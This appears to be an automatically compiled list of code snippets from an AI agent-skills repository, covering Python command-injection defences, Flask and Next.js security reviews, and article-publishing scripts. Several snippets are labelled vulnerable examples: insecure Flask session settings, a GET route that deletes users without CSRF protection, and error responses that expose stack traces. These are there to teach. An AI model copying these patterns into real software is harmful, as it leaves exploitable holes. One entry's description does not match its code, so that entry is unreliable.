Demonstrates secure practices to prevent command injection in Python, such as using list arguments with `subprocess` functions (avoiding `shell=True`), quoting arguments with `shlex.quote` when `shell=True` is unavoidable, and validating input against an allowlist using regular expressions.
```python
import subprocess
import shlex
# Use list arguments (no shell)
subprocess.run(['ping', '-c', '1', host])
subprocess.run(['grep', pattern, filename])
# If shell is required, use shlex.quote
subprocess.run(f"ping -c 1 {shlex.quote(host)}", shell=True)
# Validate against allowlist
import re
HOSTNAME_REGEX = re.compile(r'^[a-zA-Z0-9][a-zA-Z0-9.-]*$')
if not HOSTNAME_REGEX.match(host):
raise ValueError("Invalid hostname")
subprocess.run(['ping', '-c', '1', host])
```
--------------------------------
### Insecure Flask Session Configuration
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/flask-security.md
Examples of vulnerable Flask session configurations, including client-side sessions without encryption and insecure cookie settings. These can lead to session hijacking and fixation.
```python
# Client-side session without encryption
session['user_id'] = user.id
session['is_admin'] = True # User can modify!
# Insecure session configuration
app.config['SESSION_COOKIE_SECURE'] = False
app.config['SESSION_COOKIE_HTTPONLY'] = False
app.config['SESSION_COOKIE_SAMESITE'] = None
```
--------------------------------
### Run Dependency Audit Script
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/SKILL.md
Execute the provided script to audit project dependencies for known vulnerabilities.
```bash
./scripts/dependency-audit.sh
```
--------------------------------
### Convert Tables and Diagrams to PNG
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-x-article/SKILL.md
Use this script to convert markdown tables and mermaid diagrams to PNG images for compatibility with X Premium. Specify input markdown/mermaid file and output PNG path.
```bash
# Tables → PNG (auto-detected as table)
node ~/.claude/skills/diagram-to-image/scripts/diagram-to-image.mjs /tmp/table-1.md -o /tmp/table-1.png
# Mermaid → PNG (auto-detected as mermaid)
node ~/.claude/skills/diagram-to-image/scripts/diagram-to-image.mjs /tmp/diagram-1.mmd -o /tmp/diagram-1.png
```
--------------------------------
### Mermaid Flowchart Conversion
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/diagram-to-image/SKILL.md
Converts a Mermaid flowchart definition to a PNG image, saving it to a specified output path. This example demonstrates automatic filename generation based on content analysis.
```bash
node ~/.claude/skills/diagram-to-image/scripts/diagram-to-image.mjs /tmp/diagram.mmd -o ./images/login-flow.png
```
--------------------------------
### YAML Frontmatter with Straight Quotes
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/personal-writing-style/references/punctuation.md
Use straight quotes (") for Markdown frontmatter (YAML syntax requirement), code blocks, and JSON/config files. This example shows YAML frontmatter.
```yaml
# Frontmatter uses straight quotes
---
title: "文章标题"
tags: ["AI", "安全"]
---
```
--------------------------------
### Update Plugin Skills List
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/CLAUDE.md
Illustrates how to add a new skill to an existing plugin's configuration within the marketplace.json file. This involves adding the new skill's directory path to the 'skills' array.
```json
"skills": [
"./skills/existing-skill",
"./skills/new-skill"
]
```
--------------------------------
### Manual Dependency Audit with npm
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/SKILL.md
Perform a manual dependency audit using the npm command-line interface. Outputs results in JSON format.
```bash
npm audit --json
```
--------------------------------
### Vulnerable State-Changing Operations in Next.js
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/references/auth-vulnerabilities.md
Shows insecure patterns for handling state changes, including forms that lack CSRF tokens and the use of GET requests for operations that modify data.
```typescript
// ❌ VULNERABLE - Form without CSRF token (Pages Router)
```
```typescript
// ❌ VULNERABLE - State-changing GET request
export async function GET(request: Request) {
const userId = request.nextUrl.searchParams.get('id');
await db.user.delete({ where: { id: userId } });
}
```
--------------------------------
### Wait for Media Upload
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/publish-x-article/SKILL.md
Use `textGone` with a short `time` value for efficient upload waiting. The `time` parameter specifies the maximum wait duration, not a fixed delay.
```bash
# 1. Click the block element at block_index position
browser_click on the element at position block_index in the editor
# 2. Open Insert menu
browser_click on "Insert" button (Add Media button)
# 3. Click Divider menu item
browser_click on "Divider" menuitem
# Divider is inserted at cursor position
```
--------------------------------
### Secure Flask Blueprints with Authentication
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/python-security-scan/references/flask-security.md
Implement authentication for Flask blueprints to restrict access to specific routes. This example shows how to create a decorator to ensure only admin users can access blueprint routes.
```python
from functools import wraps
from flask import session, abort
def admin_required(f):
@wraps(f)
def decorated(*args, **kwargs):
if not session.get('is_admin'):
abort(403)
return f(*args, **kwargs)
return decorated
# Apply to all routes in blueprint
@admin_bp.before_request
@admin_required
def before_request():
pass # All routes in blueprint require admin
# Or per-route
@admin_bp.route('/users')
@admin_required
def list_users():
return jsonify(User.query.all())
```
--------------------------------
### Detect Verbose Error Handling in Production (TypeScript)
Source: https://github.com/sugarforever/01coder-agent-skills/blob/main/skills/nextjs-security-scan/references/owasp-top-10.md
Example of error handling that exposes internal details in a production environment. Avoid sending stack traces or sensitive error information to the client.
```typescript
if (error) {
res.status(500).json({ error: error.stack }); // Exposes internals
}
```